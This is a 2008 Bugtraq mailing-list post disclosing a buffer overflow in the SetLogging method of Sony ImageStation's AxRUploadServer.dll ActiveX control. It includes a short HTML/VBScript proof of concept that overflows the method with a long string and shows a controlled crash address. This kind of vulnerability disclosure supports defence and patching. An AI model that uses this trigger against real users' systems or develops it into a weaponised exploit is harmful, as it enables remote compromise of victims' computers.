[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20080208165359.29230.qmail@securityfocus.com>
Date: 8 Feb 2008 16:53:59 -0000
From: david130490@...mail.com
To: bugtraq@...urityfocus.com
Subject: Buffer Overflow Vulnerability in AxRUploadServer.dll, Activex
Method (SetLogging)
Buffer Overflow in AxRUploadServer.dll, this file belongs to ImageStation that is a servicemark of Sony Electronics Inc.
--------------
Access Violation at 0x42424242
The code:
<object classid='clsid:E9A7F56F-C40F-4928-8C6F-7A72F2A25222' id='bof'></object>
<input language=VBScript onclick=Son() type=button value="Explotar">
<script language='vbscript'>
Sub Son
arg1=String(5922, "A")
arg2=String(5, "B")
bof.SetLogging arg1 + arg2
End Sub
</script>
Powered by blists - more mailing lists